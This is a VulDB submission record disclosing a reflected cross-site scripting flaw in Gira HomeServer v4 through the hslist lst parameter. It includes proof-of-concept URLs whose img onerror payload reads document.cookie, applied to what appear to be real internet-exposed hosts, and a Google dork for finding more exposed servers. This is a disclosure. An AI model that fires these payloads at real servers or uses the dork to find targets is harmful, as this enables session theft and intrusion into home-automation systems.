| Title | Gira HomeServer v4 Reflected Cross-Site Scripting |
|---|---|
| Description | PoC:<br>It is possible to escape with quotes via the hslist?lst=debug parameter, causing reflected cross-site scripting<br>https://x.x.x.x/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.12.0.220829 beta)<br>https://6cfa3ae45b506ee1966df14328c60679.rnas-dyn.bluewin.ch/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E (Version 4.11.3.220701)<br>http://jrola.xyz/hslist?lst=debug%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E (Version 4.11.1.210701)<br>Google Dork:<br>intext:"Gira HomeServer 4."<br>Product:<br>https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
| Source | ⚠️ https://partner.gira.com/en/systeme/knx-system/knx-produkte/server/homeserver.html |
| User | Stux (UID 40142) |
| Submission | 2023-05-06 05:53 PM (3 years ago) |
| Moderation | 2023-05-16 04:37 PM (10 days later) |
| Status | Accepted |
| VulDB Entry | 229150 [Gira HomeServer up to 4.12.0.220829 beta /hslist lst cross site scripting] |
| Points | 20 |